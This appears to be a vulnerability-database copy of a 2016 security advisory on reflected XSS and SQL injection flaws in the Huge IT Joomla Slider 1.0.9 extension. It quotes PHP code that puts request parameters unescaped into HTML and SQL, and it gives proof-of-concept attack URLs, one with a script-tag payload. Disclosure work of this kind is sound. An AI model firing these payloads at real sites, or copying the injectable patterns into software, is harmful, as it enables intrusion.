Huge IT Joomla Slider 1.0.9 XSS / SQL Injection

🗓️ 27 Jul 2016 00:00:00Reported by Larry W. CashdollarType

packetstorm🔗 packetstormsecurity.com👁 45 Views

Reflected XSS and SQL Injection in Huge IT Joomla Slider v1.0.

Reporter	Title	Published	Views	Family All 13
CNVD	Multiple vulnerabilities in the Joomla! Huge-IT Slider extension (CNVD-2016-05829)	29 Jul 201600:00	–	cnvd
CNVD	Multiple Vulnerabilities in the Joomla! Huge-IT Slider Extension	29 Jul 201600:00	–	cnvd
CVE	CVE-2016-1000121	27 Oct 201621:00	–	cve
CVE	CVE-2016-1000122	27 Oct 201621:00	–	cve
Cvelist	CVE-2016-1000121	27 Oct 201621:00	–	cvelist
Cvelist	CVE-2016-1000122	27 Oct 201621:00	–	cvelist
EUVD	EUVD-2016-1065	7 Oct 202500:30	–	euvd
EUVD	EUVD-2016-1066	7 Oct 202500:30	–	euvd
NVD	CVE-2016-1000121	27 Oct 201621:59	–	nvd
NVD	CVE-2016-1000122	27 Oct 201621:59	–	nvd

`Title: Reflected XSS and SQLi in Huge IT Joomla Slider v1.0.9 extension  
Author: Larry W. Cashdollar, @_larry0  
Date: 2016-07-22  
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/slider  
Vendor: huge-it.com  
Vendor Notified: 2016-07-22  
Vendor Contact:  
Description: Huge-IT Slider extension is one of the powerful products that our company offer. It gives style and charm to your site and help to attract the attention of visitors to certain parts of the content.  
Vulnerability:  
The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability.  
  
XSS in ./admin/views/slider/tmpl/default.php via id variable:  
275: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_slider&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Video" >  
  
SQL Injection in the following sections of code:  
  
in file ./admin/models/slider.php  
53: $id_cat = JRequest::getVar('id');  
54- $query = $db->getQuery(true);  
55- $query->select('#__huge_itslider_images.name as name,'  
56- . '#__huge_itslider_images.id ,'  
57- . '#__huge_itslider_sliders.name as portName,'  
58- . 'slider_id, #__huge_itslider_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itslider_images.ordering,#__huge_itslider_images.published,published_in_sl_width');  
--  
69: $id_cat = JRequest::getVar('id');  
70- $query = $db->getQuery(true);  
71- $query->select('*');  
72- $query->from('#__huge_itslider_images');  
73- $query->where('slider_id=' . $id_cat);  
74- $db->setQuery($query);  
--  
117: $id_cat = JRequest::getVar('id');  
118-  
119- $query = $db->getQuery(true);  
120- $query->update('#__huge_itslider_sliders')->set('name ="' . $name . '"')  
121- ->set('sl_height="' . $sl_height . '"')->set('slider_list_effects_s="' . $slider_effects_list . '"')  
122- ->set('pause_on_hover="' . $pause_on_hover . '"')  
--  
133: $id_cat = JRequest::getVar('id');  
134- $query = $db->getQuery(true);  
135- $query->update('#__huge_itslider_sliders')->set('slider_list_effects_s ="' . $styleName . '"')->where('id="' . $id_cat . '"');  
136- $db->setQuery($query);  
137- $db->execute();  
138- }  
--  
182: $id_cat = JRequest::getVar('removeslide');  
183: $id = JRequest::getVar('id');  
184- $db = JFactory::getDBO();  
185- $query = $db->getQuery(true);  
186- $query->delete('#__huge_itslider_images')->where('id =' . $id_cat);  
187- $db->setQuery($query);  
188- $db->execute();  
  
CVE-2016-1000121 XSS  
CVE-2016-1000122 SQLi  
JSON: Export  
Exploit Code:  
aC/ XSS:  
aC/   
aC/ http://192.168.0.125/administrator/index.php?option=com_slider&view=slider&id=1%20--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E  
aC/   
aC/ SQLi:  
aC/   
aC/ http://192.168.0.125/administrator/index.php?option=com_slider&view=slider&id=HERE  
  
Advisory: http://www.vapidlabs.com/advisory.php?v=168  
`

27 Jul 2016 00:00Current

1.5Low risk

Vulners AI Score1.5

EPSS0.00899